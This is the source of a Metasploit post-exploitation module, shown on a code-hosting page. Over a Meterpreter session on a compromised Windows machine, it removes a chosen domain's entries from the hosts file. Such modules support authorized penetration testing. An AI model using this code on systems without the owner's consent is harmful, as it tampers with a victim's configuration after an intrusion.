Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/remove_host.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Windows Manage Host File Entry Removal',

13
        'Description' => %q{

14
          This module allows the attacker to remove an entry from the Windows hosts file.

15
        },

16
        'License' => BSD_LICENSE,

17
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],

18
        'Platform' => [ 'win' ],

19
        'SessionTypes' => [ 'meterpreter' ],

20
        'Compat' => {

21
          'Meterpreter' => {

22
            'Commands' => %w[

23
              core_channel_close

24
              core_channel_eof

25
              core_channel_open

26
              core_channel_read

27
              core_channel_tell

28
              core_channel_write

29
            ]

30
          }

31
        },

32
        'Notes' => {

33
          'Stability' => [CRASH_SAFE],

34
          'SideEffects' => [CONFIG_CHANGES],

35
          'Reliability' => []

36
        }

37
      )

38
    )

39


40
    register_options(

41
      [

42
        OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])

43
      ]

44
    )

45
  end

46


47
  def hosts_path

48
    root = client.sys.config.getenv('SystemRoot') ||

49
           client.sys.config.getenv('windir') ||

50
           'C:\\Windows'

51
    "#{root}\\System32\\drivers\\etc\\hosts"

52
  end

53


54
  def run

55
    hosttoremove = datastore['DOMAIN']

56
    path = hosts_path

57
    fd = client.fs.file.new(path, 'r+b')

58


59
    # Get a temporary file path

60
    meterp_temp = Tempfile.new('meterp')

61
    meterp_temp.binmode

62


63
    print_status("Removing hosts file entry pointing to #{hosttoremove}")

64


65
    newfile = ''

66
    fdray = fd.read.split("\r\n")

67


68
    fdray.each do |line|

69
      main_part = line.split('#', 2).first.to_s.strip

70
      parts = main_part.split(/\s+/)

71
      if parts[1..-1].to_a.include?(hosttoremove)

72
        parts.delete_if { |p| p.casecmp(hosttoremove).zero? }

73
        next if parts.size < 2

74


75
        rebuilt = parts.join(' ')

76
        rebuilt += " " + line.split('#', 2).last if line.include?('#')

77
        newfile += "#{rebuilt}\r\n"

78
      else

79
        newfile += "#{line}\r\n"

80
      end

81
    end

82


83
    fd.close

84


85
    meterp_temp.write(newfile)

86
    meterp_temp.close

87


88
    client.fs.file.upload_file(path, meterp_temp)

89
    print_good('Done!')

90
  end

91
end

92


93